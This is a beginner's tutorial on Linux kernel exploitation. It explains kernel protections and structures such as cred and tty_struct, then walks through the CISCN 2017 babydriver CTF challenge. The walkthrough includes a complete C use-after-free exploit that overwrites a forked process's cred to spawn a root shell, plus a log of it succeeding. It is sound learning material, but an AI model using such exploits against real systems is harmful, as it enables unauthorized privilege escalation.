I'm still a novice: I kept putting off the kernel for a long time and am only now starting to learn it.
Basic
Kernel
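The kernel is a program: the lowest layer of the operating system, which manages the requests issued by the software above it. The kernel translates these requests into instructions and hands them to the hardware. In short, the kernel is the middle layer that connects software and hardware.
The kernel provides two main functions: interacting with the hardware and providing the environment in which applications run.
Intel CPUs divide privilege into four levels, Ring 0, Ring 1, Ring 2 and Ring 3, in decreasing order of privilege. Code at a more privileged level can use the resources of the less privileged levels.
On common operating systems (Windows, Linux, macOS), the kernel runs at Ring 0 and applications run at Ring 3.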
LKM
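A kernel module is a plug-in point that the Linux kernel exposes to the outside, called a Loadable Kernel Module (LKM). LKMs make up for the kernel's limited extensibility and maintainability: like building blocks, they can be plugged into the kernel and unloaded again. A typical peripheral driver is an LKM.
Like a user-space executable, an LKM file on Linux is an ELF file, so it can be analyzed with IDA.
An LKM is compiled separately but cannot run on its own; it only runs as part of the OS kernel.
The commands related to LKMs are:
insmod: load the specified module into the kernel
rmmod: unload the specified module from the kernel
lsmod: list the modules that are currently loaded
modprobe: add or remove modules; when loading a module, modprobe also resolves its dependencies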
syscall
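A system call is a request from a user-space program to the operating system kernel for a service that needs higher privilege, such as I/O or inter-process communication. System calls are the interface between user programs and the operating system. Some library functions are wrappers around system calls: I/O functions such as scanf and puts ultimately call read and write.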
ioctl
ioctl is also a system call, used to communicate with devices. The man page describes it in detail:
NAME
       ioctl - control device

SYNOPSIS
       #include <sys/ioctl.h>

       int ioctl(int fd, unsigned long request, ...);

DESCRIPTION
       The ioctl() system call manipulates the underlying device parameters
       of special files. In particular, many operating characteristics of
       character special files (e.g., terminals) may be controlled with
       ioctl() requests. The argument fd must be an open file descriptor.

       The second argument is a device-dependent request code. The third
       argument is an untyped pointer to memory. It's traditionally char
       *argp (from the days before void * was valid C), and will be so
       named for this discussion.

       An ioctl() request has encoded in it whether the argument is an in
       parameter or out parameter, and the size of the argument argp in
       bytes. Macros and defines used in specifying an ioctl() request
       are located in the file <sys/ioctl.h>.
       ......
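The first argument is the file descriptor returned by opening the device with open. The second argument is the control command that the user program sends to the device. Any further arguments are supplementary and device-specific.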
State switching
User Space To Kernel Space
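A switch from user mode to kernel mode happens on a system call, an exception, or an interrupt raised by a peripheral. The steps are:
1. Switch the GS segment register with swapgs. swapgs exchanges the current GS base with a value kept in a fixed location (the IA32_KERNEL_GS_BASE MSR), which saves the user GS value and makes the stored value the GS used while the kernel runs.
2. Record the current stack pointer (the top of the user-space stack) in the per-CPU variable area, and load the kernel stack top recorded in the per-CPU area into rsp/esp.
3. Save the register values with push. The code is as follows: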
ENTRY(entry_SYSCALL_64)
    /* SWAPGS_UNSAFE_STACK is a macro; on x86 it is defined directly as the swapgs instruction */
    SWAPGS_UNSAFE_STACK

    /* Save the user stack pointer and switch to the kernel stack */
    movq    %rsp, PER_CPU_VAR(rsp_scratch)
    movq    PER_CPU_VAR(cpu_current_top_of_stack), %rsp

    /* Save the register values with push, forming a pt_regs structure */
    /* Construct struct pt_regs on stack */
    pushq   $__USER_DS                      /* pt_regs->ss */
    pushq   PER_CPU_VAR(rsp_scratch)        /* pt_regs->sp */
    pushq   %r11                            /* pt_regs->flags */
    pushq   $__USER_CS                      /* pt_regs->cs */
    pushq   %rcx                            /* pt_regs->ip */
    pushq   %rax                            /* pt_regs->orig_ax */
    pushq   %rdi                            /* pt_regs->di */
    pushq   %rsi                            /* pt_regs->si */
    pushq   %rdx                            /* pt_regs->dx */
    pushq   %rcx                            /* pt_regs->cx */
    pushq   $-ENOSYS                        /* pt_regs->ax */
    pushq   %r8                             /* pt_regs->r8 */
    pushq   %r9                             /* pt_regs->r9 */
    pushq   %r10                            /* pt_regs->r10 */
    pushq   %r11                            /* pt_regs->r11 */
    sub     $(6*8), %rsp                    /* pt_regs->bp, bx, r12-15 not saved */
Kernel Space To User Space
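1. Restore the GS value with swapgs.
2. Return to user space with sysretq or iretq and continue execution there. With iretq, some user-space state must also be supplied (CS, eflags/rflags, esp/rsp, and so on).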
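struct cred
The kernel records a process's privilege information in a cred structure. If the data in the cred structure can be controlled, privileges can be escalated.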
struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC      0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t      uid;            /* real UID of the task */
    kgid_t      gid;            /* real GID of the task */
    kuid_t      suid;           /* saved UID of the task */
    kgid_t      sgid;           /* saved GID of the task */
    kuid_t      euid;           /* effective UID of the task */
    kgid_t      egid;           /* effective GID of the task */
    kuid_t      fsuid;          /* UID for VFS ops */
    kgid_t      fsgid;          /* GID for VFS ops */
    unsigned    securebits;     /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;   /* caps we're permitted */
    kernel_cap_t    cap_effective;   /* caps we can actually use */
    kernel_cap_t    cap_bset;        /* capability bounding set */
    kernel_cap_t    cap_ambient;     /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char   jit_keyring;     /* default keyring to attach requested
                                      * keys to */
    struct key __rcu *session_keyring; /* keyring inherited over fork */
    struct key  *process_keyring;    /* keyring private to this process */
    struct key  *thread_keyring;     /* keyring private to this thread */
    struct key  *request_key_auth;   /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;      /* subjective LSM security */
#endif
    struct user_struct *user;   /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;  /* supplementary groups for euid/fsgid */
    struct rcu_head rcu;        /* RCU deletion hook */
} __randomize_layout;
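The kernel also has two functions that can change a process's privileges:
int commit_creds(struct cred *new);
struct cred *prepare_kernel_cred(struct task_struct *daemon);
How can the addresses of commit_creds() and prepare_kernel_cred() be obtained?
/proc/kallsyms lists the addresses of these functions, and with sufficient privileges they can be read from it. KASLR is a protection mechanism: when it is enabled, the function addresses change from boot to boot. They are shifted by the same offset as the gadgets that ropper extracts from vmlinux, so both share the same base address.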
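tty_struct and tty_operations
tty_struct holds a pointer to a tty_operations structure, which in turn contains a large number of function pointers. These two structures are useful for bypassing SMEP, a protection added by the kernel developers:
Supervisor Mode Execution Protection (SMEP) protects the kernel by forbidding it from executing user-space code. With SMEP disabled, a stack overflow can overwrite a return address on the kernel stack so that it points to a code fragment in user space, which is then executed. With SMEP enabled, the CPU is in ring 0 at that point, and attempting to execute code in user-space pages triggers a page fault.
Whether SMEP is on is determined by bit 20 of the CR4 register: 1 means enabled, 0 means disabled. To check for SMEP:
cat /proc/cpuinfo | grep smep
open("/dev/ptmx", O_RDWR|O_NOCTTY) allocates a tty_struct. By making good use of this structure and the function pointers it leads to, a "mov cr4, reg" gadget can be reached to change the contents of CR4, which bypasses the SMEP check so that a code fragment in user space executes successfully.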
The tty_struct structure
struct tty_struct {
    int magic;
    struct kref kref;
    struct device *dev;
    struct tty_driver *driver;
    const struct tty_operations *ops;
    int index;
    /* Protects ldisc changes: Lock tty not pty */
    struct ld_semaphore ldisc_sem;
    struct tty_ldisc *ldisc;
    struct mutex atomic_write_lock;
    struct mutex legacy_mutex;
    struct mutex throttle_mutex;
    struct rw_semaphore termios_rwsem;
    struct mutex winsize_mutex;
    spinlock_t ctrl_lock;
    spinlock_t flow_lock;
    /* Termios values are protected by the termios rwsem */
    struct ktermios termios, termios_locked;
    struct termiox *termiox;    /* May be NULL for unsupported */
    char name[64];
    struct pid *pgrp;           /* Protected by ctrl lock */
    struct pid *session;
    unsigned long flags;
    int count;
    struct winsize winsize;     /* winsize_mutex */
    unsigned long stopped:1,    /* flow_lock */
                  flow_stopped:1,
                  unused:BITS_PER_LONG - 2;
    int hw_stopped;
    unsigned long ctrl_status:8,    /* ctrl_lock */
                  packet:1,
                  unused_ctrl:BITS_PER_LONG - 9;
    unsigned int receive_room;  /* Bytes free for queue */
    int flow_change;
    struct tty_struct *link;
    struct fasync_struct *fasync;
    wait_queue_head_t write_wait;
    wait_queue_head_t read_wait;
    struct work_struct hangup_work;
    void *disc_data;
    void *driver_data;
    spinlock_t files_lock;      /* protects tty_files list */
    struct list_head tty_files;

    int closing;
    unsigned char *write_buf;
    int write_cnt;
    /* If the tty has a pending do_SAK, queue it here - akpm */
    struct work_struct SAK_work;
    struct tty_port *port;
} __randomize_layout;
The tty_operations structure
struct tty_operations {
    struct tty_struct * (*lookup)(struct tty_driver *driver,
            struct file *filp, int idx);
    int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
    int  (*open)(struct tty_struct * tty, struct file * filp);
    void (*close)(struct tty_struct * tty, struct file * filp);
    void (*shutdown)(struct tty_struct *tty);
    void (*cleanup)(struct tty_struct *tty);
    int  (*write)(struct tty_struct * tty,
            const unsigned char *buf, int count);
    int  (*put_char)(struct tty_struct *tty, unsigned char ch);
    void (*flush_chars)(struct tty_struct *tty);
    int  (*write_room)(struct tty_struct *tty);
    int  (*chars_in_buffer)(struct tty_struct *tty);
    int  (*ioctl)(struct tty_struct *tty,
            unsigned int cmd, unsigned long arg);
    long (*compat_ioctl)(struct tty_struct *tty,
            unsigned int cmd, unsigned long arg);
    void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
    void (*throttle)(struct tty_struct * tty);
    void (*unthrottle)(struct tty_struct * tty);
    void (*stop)(struct tty_struct *tty);
    void (*start)(struct tty_struct *tty);
    void (*hangup)(struct tty_struct *tty);
    int (*break_ctl)(struct tty_struct *tty, int state);
    void (*flush_buffer)(struct tty_struct *tty);
    void (*set_ldisc)(struct tty_struct *tty);
    void (*wait_until_sent)(struct tty_struct *tty, int timeout);
    void (*send_xchar)(struct tty_struct *tty, char ch);
    int (*tiocmget)(struct tty_struct *tty);
    int (*tiocmset)(struct tty_struct *tty,
            unsigned int set, unsigned int clear);
    int (*resize)(struct tty_struct *tty, struct winsize *ws);
    int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
    int (*get_icount)(struct tty_struct *tty,
            struct serial_icounter_struct *icount);
    void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
    int (*poll_init)(struct tty_driver *driver, int line, char *options);
    int (*poll_get_char)(struct tty_driver *driver, int line);
    void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
    int (*proc_show)(struct seq_file *, void *);
} __randomize_layout;
Additional content
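Besides KASLR and SMEP, there are other common protection mechanisms:
MMAP_MIN_ADDR:
The MMAP_MIN_ADDR protection prevents programs from mapping memory at low addresses, which defends against NULL pointer dereferences.
Without this protection, the following attack is possible:
A function pointer is 0, and the program can map memory at address 0x000000.
The program writes malicious code at address 0x000000.
The program triggers a kernel BUG(). BUG() here is the Linux kernel's mechanism for catching kernel behavior that falls outside what is expected; it is a way for software to report an anomaly on its own initiative.
The kernel executes the malicious code.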
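SMAP:
Supervisor Mode Access Prevention forbids the kernel from accessing user-space data.
PTI:
Kernel page-table isolation (KPTI, also PTI, formerly KAISER) is a hardening technique in the Linux kernel that better isolates user-space and kernel-space memory to improve security, mitigating the "Meltdown" hardware security flaw in modern x86 CPUs.
That concludes this brief introduction to the kernel.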
UAF
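Brief analysis
From here on I learn Linux kernel exploitation in PWN challenges by working through problems.
I use CISCN_2017_babydriver as the example; this is only a first look at kernel pwn.
Unpacking the challenge archive gives three files: boot.sh, bzImage, and rootfs.cpio.
First, look at boot.sh: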
#!/bin/bash

qemu-system-x86_64 \
    -initrd rootfs.cpio \
    -kernel bzImage \
    -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
    -enable-kvm \
    -monitor /dev/null \
    -m 64M \
    --nographic \
    -smp cores=1,threads=1 \
    -cpu kvm64,+smep
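boot.sh is the script that boots the kernel image; it invokes qemu to get the kernel running.
1. -initrd rootfs.cpio: use rootfs.cpio as the file system the kernel boots with
2. -kernel bzImage: use bzImage as the kernel image
3. -m 64M: set the virtual RAM to 64M (the default is 128M)
4. -cpu kvm64,+smep: set the CPU security options; SMEP is enabled here
bzImage is the compressed kernel image. If needed, vmlinux can be extracted from it with extract-vmlinux. For later ROP work, gadgets can be extracted with ropper, simply because ROPgadget is too slow.
rootfs.cpio is the archive of the kernel's file system and contains the main system files. It is gzip-compressed, so create a directory, decompress it there, and unpack it: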
root@kali:~/babydriver# mkdir tmp
root@kali:~/babydriver# ls
boot.sh bzImage rootfs.cpio tmp
root@kali:~/babydriver# cp rootfs.cpio ./tmp/rootfs.cpio.gz
root@kali:~/babydriver# cd tmp/
root@kali:~/babydriver/tmp# gunzip ./rootfs.cpio.gz
root@kali:~/babydriver/tmp# cpio -idmv < rootfs.cpio
......
root@kali:~/babydriver/tmp# ls
bin etc home init lib linuxrc proc rootfs.cpio sbin sys tmp usr
It contains an init file; look at it:
root@kali:~/babydriver/tmp# cat init
#!/bin/sh

mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev
chown root:root flag
chmod 400 flag
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

insmod /lib/modules/4.4.72/babydriver.ko
chmod 777 /dev/babydev
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys
poweroff -d 0 -f
The script mounts directories and sets permissions, and insmod loads the babydriver.ko driver. That driver is where to look for the vulnerability, so load the file into IDA and decompile it.
A brief analysis yields the following:
1. The driver has a structure that stores a pointer and a size:
00000000 babydevice_t struc ; (sizeof=0x10, align=0x8)
00000000
00000000 device_buf dq ?
00000000
00000008 device_buf_len dq ?
00000008
00000010 babydevice_t ends
2. babyioctl checks the command; if it matches, it frees the previous pointer, allocates new memory with kmalloc, and updates the structure:
if ( command == 0x10001 )
{
    kfree(babydev_struct.device_buf);
    babydev_struct.device_buf = (char *)_kmalloc(size, 0x24000C0LL);
    babydev_struct.device_buf_len = size;
}
3. babyread copies size bytes from kernel space to user space, provided size is smaller than the buffer length:
if ( babydev_struct.device_buf )
{
    if ( babydev_struct.device_buf_len > size )
        copy_to_user(buffer, babydev_struct.device_buf, size);
}
4. babywrite copies size bytes from user space to kernel space, with the same length check:
if ( babydev_struct.device_buf )
{
    if ( babydev_struct.device_buf_len > size )
        copy_from_user(babydev_struct.device_buf, buffer, size);
}
5. babyopen allocates a 0x40-byte buffer and updates the structure:
babydev_struct.device_buf = (char *)kmem_cache_alloc_trace(kmalloc_caches[6], 0x24000C0LL, 0x40LL);
babydev_struct.device_buf_len = 0x40LL;
6. babyrelease frees the memory held in the structure, without clearing the pointer:
_fentry__(inode, filp);
kfree(babydev_struct.device_buf);
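Approach
Vulnerabilities:
1. A pseudo race condition: the structure is global, so when the device is opened twice, the buffer pointer from the second open overwrites the one from the first.
2. Releasing one of the two handles frees the buffer while the other handle can still use it, which is a use-after-free (UAF).
3. When the program calls fork(), the kernel allocates space for the new process's cred, which stores its privilege information. If the size of the buffer allocated through the device can be controlled, the cred allocation can be made to land in the buffer that was just freed, and the UAF can then overwrite the uid fields in cred to escalate to root.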
Exploit
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

int main()
{
    // Open the device twice; both descriptors share the global babydev_struct
    int fd1 = open("/dev/babydev", O_RDWR);
    int fd2 = open("/dev/babydev", O_RDWR);

    // Reallocate device_buf so that device_buf_len becomes sizeof(struct cred)
    ioctl(fd1, 0x10001, 0xA8);

    // Release fd1: the buffer is freed, but fd2 can still reach it
    close(fd1);

    // The cred of the new process will overlap the buffer that was just freed
    int pid = fork();
    if (pid < 0)
    {
        puts("[*] fork error!");
        exit(0);
    }
    else if (pid == 0)
    {
        // Write through fd2 to set uid, gid, etc. in the new process's cred to 0
        char zeros[30] = {0};
        write(fd2, zeros, 28);

        if (getuid() == 0)
        {
            puts("[+] root now.");
            system("/bin/sh");
            exit(0);
        }
    }
    else
    {
        wait(NULL);
    }
    close(fd2);

    return 0;
}
Compile statically and repack the file system:
root@kali:~/babydriver# gcc exp.c --static -o exp
......
root@kali:~/babydriver# mv exp ./tmp/
root@kali:~/babydriver# cd ./tmp
root@kali:~/babydriver/tmp# find . |cpio -o --format=newc > rootfs.cpio
......
root@kali:~/babydriver/tmp# mv rootfs.cpio ..
root@kali:~/babydriver/tmp# cd ..
root@kali:~/babydriver# ./boot.sh
......
/ $ ls
bin etc lib root sys
cred home linuxrc rootfs.cpio tmp
dev init proc sbin usr
/ $ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
/ $ ./cred
[ 48.699265] device open
[ 48.700565] device open
[ 48.701899] alloc done
[ 48.703283] device release
[+] root now.
/ # id
uid=0(root) gid=0(root) groups=1000(ctf)
/ #
Use gdb and qemu to debug the vmlinux
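1. Add "-s" to the qemu command in boot.sh, then run the script.
2. Debug the vmlinux file with "gdb vmlinux -q"; vmlinux can be extracted from bzImage with extract-vmlinux:
Load the driver's symbol table
"cat /sys/module/device_name/sections/.text" in the VM gives the base address of the driver's .text section
......
pwndbg> add-symbol-file the_address_of_device_file text_address
Set a breakpoint
pwndbg> b func_name
Connect to the kernel VM that is already running
pwndbg> target remote localhost:1234
If gdb reports Remote 'g' packet reply is too long, set the architecture
pwndbg> set architecture i386:x86-64:intel
To go back to working in the VM
pwndbg> c
Continuing.
3. Back in the kernel VM, run the exploit program; gdb stops at the breakpoint automatically, which makes debugging the exploit convenient.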